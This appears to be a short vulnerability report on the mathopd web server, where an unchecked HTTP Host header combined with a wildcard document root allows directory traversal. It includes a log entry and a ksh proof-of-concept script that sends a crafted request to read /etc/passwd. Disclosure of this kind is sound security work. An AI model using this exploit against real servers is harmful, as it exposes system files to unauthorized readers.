Quite easy to reproduce with ksh script attached. HTTP Host is not checked in the DNS to see if it matches socket. This would be expensive. Checking Host against glob would be faster.
If config could match /** or **..** in domains then it would be okay, but it did not seem to match. "**" should match any including '/'. However, Host is not globbed. The only fix is to have multiple Virtual sections for each document root with Host entries for each HTTP Host. I.e. you must use the exact HTTP Host. Do not use Location /var/www/* as this matches any arbitrary HTTP Host. In example you could spam users in /etc/password and say bad things about admin. /var/log/mathopd/access.log > 127.0.0.1 - Sat Jul 28 09:29:39 2012 ../../etc 80 > GET /passwd - HTTP/1.1 200 60 - -
#!/usr/bin/ksh # Superfluous carriage return may be required my_echo() { printf "%b\r\n" "$*"; } test -n "$2" || set -- ../../etc /passwd exec 3<>/dev/tcp/localhost/80 { my_echo "GET $2 HTTP/1.1" my_echo "Host: $1" my_echo "Connection: close" my_echo "" } >&3 while read -r LINE do printf "%s\n" "$LINE" done <&3